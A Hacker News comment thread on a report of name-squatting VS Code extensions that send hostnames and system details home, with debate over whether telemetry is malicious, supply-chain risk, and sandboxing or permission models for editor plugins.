Vscode was always going to attract such issues. On my system, the app does not have access to the home directory and everything is done on a remote container that I locally ssh into (thanks to flatpak's bubblewrap and docker). As a result everything is cleaner and vscode is isolated from the host.

Access to local folders on the host (though rare) is approved on a needs basis.


I think this is missing advice for staying safe. It mostly just pushes their product and says

> it’s our responsibility to verify

I'd recommend checking of your extensions are from a verified publisher. See https://code.visualstudio.com/api/working-with-extensions/pu...


I always find this question interesting.

Is there a money to be made in a company that main purpose would be to provide periodic check on the source code dependencies. So that for a certain amount of payment, you get to submit a list of dependencies and they monitor the source code and give a report with that changes, problems and security issues. So it is like a Source code check as a service.


I think this is what WhiteSource does. (it's also apparently called Mend now)


Not only are the products confusing (which one does what parent mentioned?) but that pricing is out of reach for so many I'm wondering if the company is actually real or not?

Cheapest plan starts at 1333 USD per month!


If you are a big corp a security leak costs you 10 mil USD, it might make sense to pay. Instead of paying $50k for a one time security audit, you get a part of it in the form of a subscription.


I wonder if there's a marketplace or active efforts for bad actors to buy popular vscode extensions so that they can inject malware into formerly trusted extensions? If you have a popular vscode extension do you get people reaching out to you to offer to buy it? I know this was fairly commonplace with browser addons.


let this be a reminder that little snitch has existed for a long time and we all should be using it in prompt-for-everything mode.

there are multiple implementations for macos. there are multiple implementations for linux. run, don’t walk.

yes, there are tradeoffs. you may even changes your web browsing habits to avoid a tirade of prompts from some random chum bucket. it’s all worth it when one of your eyebrows goes up after some process that tries to make a dns request it doesn’t have any business making. then you hit deny. then you investigate.

now all we need is little snitch for filesystems. maybe we can build it on encrypted fuse mounts.


Hard to gauge the actual impact without privileged access, as I would guess authors of these extensions would pump the downloads to get higher in rankings, raking in higher numbers of actual victims.


Calling analytics telemetry malicious is exaggeration. But the telemetry should be an opt-in, or at least, a visible opt-out.


Name/typo squatting is deceptive and malicious. The telemetry helps the attacker detect when a valuable target begins using the software, enabling a targeted supply-chain attack.


Hardly a newsworthy article IMO.


This article is a good example of how to write a misleading headline. They found 3 extensions, one of which has 45k downloads (because it name squats on a popular package), and another with 1000 installs.

The 45k dowload extension (Darcula Dark) collects some data that I would define as telemetry, and the python-vscode extension which is clearly trying to hide what it's doing. Now, whether you define telemetry as malicious or not may shape how you feel, but let's be honest, there's a world of difference between sending your OS versions to a telemetry server and injecting obfuscated code.


Woah, that's a narrow view.

Name/typo-squatting in inherently malicious as there's intent to deceive. It doesn't matter what code is _currently_ present and that can change at any time.

Besides, think about how you'd maliciously use that telemetry. If the author sees installations coming from intuit.com (for example) then they know they are one auto-update away from having a foothold on a company network with tons of sensitive data. That's a targeted supply-chain attack.


This is my thinking exactly. If you put exploit code in there in day one, you are likely to be found out quickly. But if you wait until you detect a valuable target, test the waters with a non-malicious update, then you can probably distribute the malicious update to run in a targeted fashion, perhaps even rolling it back shortly after to reduce later forensic investigation.

We need to stop treating our dev tools like they are trusted. They are not, and they rely more and more on networks of even less trustworthy code. That VSCOde doesn’t have a proper sandbox or TCB for its plugins is pretty damning.


> collects some data that I would define as telemetry

Maybe the platform and os can be described as "telemetry", but logging the hostname definitely counts as stealing private data!

Apple by default uses the user's name as host name (eg. "John-Does-Macbook-Air.local"), so you could use this to determine if a specific person has installed your extension.

That is spyware, not telemetry.

The malicious extension could then, once it has determined a specific target user has installed the extension, ship a malicious update.


Name squatting always betrays malicious intent. No benefit of the doubt is owed to anyone practicing it.


Before you go down this rabbit hole, consider that many extensions are slight forks of others. There isn't always malicious intent. Just people who try to extend the extensions and publish them without knowing otherwise.

For example go look at any popular "Hello world" type of extension and you'll see many results of extensions in this definition of "name squatting".

i.e. https://marketplace.visualstudio.com/search?term=word%20coun...

VS Code Marketplace has a namesquatting problem. It doesn't always imply malicious intent though.


When you add telemetry to a fork of a thing that didn't previously have telemetry, you don't deserve the benefit of doubt. The original didn't need telemetry, so neither does your fork. Anybody who does this should be assumed malicious.

And telemetry for a fucking color theme? You've got shitting me. Whoever did this is a Grade-A scumbag. It didn't happen by accident and there is no possible benign motivation for it. I hope somebody has reported this to the FBI and other relevant authorities.


Non-malicious forks would choose a completely different name and mention the original in their README.

Name squatting relies on people making a typo and installing your stuff. That cannot be innocent, come on now.

Your link also does not prove anything except that people naively make extensions with the same name that feels cute or easily discoverable to them. I see no name squatting in that list, not in the top 10-20 anyway.


> Name squatting relies on people making a typo and installing your stuff. That cannot be innocent, come on now.

You are thinking of typosquatting. And my example shows people can publish extensions squatting on the same extension name as established ones while also changing other metadata to impersonate or spoof popular ones and confuse users quickly looking to install the extension.


But it does imply a trust and quality issue with the VSCode marketplace.

Combined with the lack of a proper sandbox or TCB for plugins, having an untrustworthy “marketplace” makes VSCode sound like a disaster waiting to be installed.


That's an opinion.

Another opinion is that there is plenty of crap on every registry and some are better at surfacing and cleaning up than others.

Similar to the US Navy and ships that are rust-free versus those battling rust. It doesn't affect the performance of those ships, just the perception. Left on for too long could eat away the actual integrity.

Not all problems are the registry's to burden. Trust and quality decisions are very individual for example. There's no same definition used between two people.


VSCode doesn’t even provide a framework for enabling that decision making. Sure, you could forgo the use of any plugins, but so much of VScode’s functionality is derived from plugins, you’d be better off just using notepad.

To be fair, vim and emacs aren’t any better.

Most of our dev tools are based on plug-in models that have zero security model baked in.


> VSCode doesn’t even provide a framework for enabling that decision making.

How about notable publisher, verified publisher, # of downloads, rating, reviews, README, GitHub repository, extension icon, project details, repository maintenance, etc?


Most of those are social signals, and social engineering is a thing. Sure, you can read the code for every single update for every single plug-in you have to use for VSCode to function.

Having a proper set of API boundaries with security guarantees is the right solution. Even “notable publishers” can get hacked.

I don’t even understand why it’s an open question, tbh.


Darcula Dark could easily be what it says it is, which is an innocent take on the VS Code’s default Darcula theme. I’d be willing to bet there are innocent VSCode extensions with Darcula in the title, and I don’t think that’s unreasonable or traitorous of any kind of intent


Still doesn't excuse telemetry for something as trivial though.

Innocent == 100% offline and benefiting society. If they need telemetry for a color theme then they are not innocent.


I’m not defending the package, just pointing out that sharing a namespace doesn’t instantly imply guilt


This is even more true considering that VS Code sends telemetry by default (opt-out), making it as a whole "malicious PII stealer code" in the article's terms.


Not really, if you are aware of that and have been actively been opting out of vscode telemetry it is downright malicious of addons to do it behind your back anyway.


If a product forces you to opt-out from telemetry, it makes sense that extensions would approach the problem the same way and force you to opt-out from each extension's telemetry.

I'm not saying that's good, just that it makes sense that whatever ecosystem/community spawns from your product, they adopt the same methodology as the main product uses.


It makes more sense that the extension would check the configured telemetry enablement state and use that. Perhaps provide an extension-specific override, but certainly don’t default to anything besides the global value.

This is what happens if you use the first party telemetry module msft provides, but obviously not if you’re just sending random http requests.


It would be good if VSCode asked you which permissions a plugin should have. E.g. a lot of plugins shouldn't be talking to the internet, writing to disk or similar in the first place. And if they do you should be able to whitelist what they're allowed to access.


There are generally two ways to go about to enable plugins in whatever you're building:

- Clear API boundaries that defines what you can do or not, with each API surface being obsessively guarded in terms of what it lets through. Usually leads to secure extensions but hard (if not impossible) to do things the API authors didn't foresee as it's locked down hard. Figma plugins use this approach.

- Give extensions raw access to the host platform, to do whatever they want. This is what VSCode and many others do, which comes with a lot of issues regarding security, but plugin authors can essentially do whatever they want.

The first approach requires a lot of careful consideration, development time and maintenance, while leading also to a somewhat locked down environment. It's more secure, but also limits the usefulness of some extensions.

Microsoft, in their usual lazy fashion, chose the latter approach, probably because it makes the most money sense. Why spend a lot of development time (and money) when you can do it faster and for less money? Some security holes won't lose you a ton of money, but spending N developers building a proper plugin API will for sure cost you a ton of money.


Actually, the VS Code approach is closer to the first one (Clear API boundaries). VS Code extensions don't have direct access to internals, no direct access to the UI [1], and extensions can control VS Code only via the Extension API [2]. However, extensions have access to many standard JS functionalities that could be used in the wrong way.

By the way, Figma plugins can also send arbitrary information (such as file contents) to external servers.

That said, I think it's good idea to add to extensions permissions/capabilities security like in mobile apps.

P.S. If the Extension API doesn't have what you need, there are Proposed APIs [3], but you can't use them in published extensions, and sometimes proposals move very slowly.

[2] https://code.visualstudio.com/api/extension-capabilities/ove... [1] https://code.visualstudio.com/api/references/vscode-api [3] https://code.visualstudio.com/api/advanced-topics/using-prop...


How about a third way:

- Give extensions the ability to do whatever they want (in the sense of not requiring them to only call your specific API signatures), but run then in a sandbox, so that they have to ask for access to the internet, filesystem, and so on?


Certainly not the worst approach, but it might turn out far less watertight than hoped. E.g. plenty of places in html-based UI where you can sneak in an URL that pulls some image, with all the data sent upstream you can fit in a GET. And good luck noticing, when everything is on https and someone decided that certificates should be pinned.


> Not really, if you are aware of that and have been actively been opting out of vscode telemetry

Or use VSCodium instead. https://vscodium.com


And from what I remember VS Code associates your complete MAC address with that telemetry (it applies some ineffective obfuscation).


uhm, it sends your hostname, detailed OS information, and by default, your publicly routable ip address (on the packet). That's pretty malicious.

I don't think the title was deceptive.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: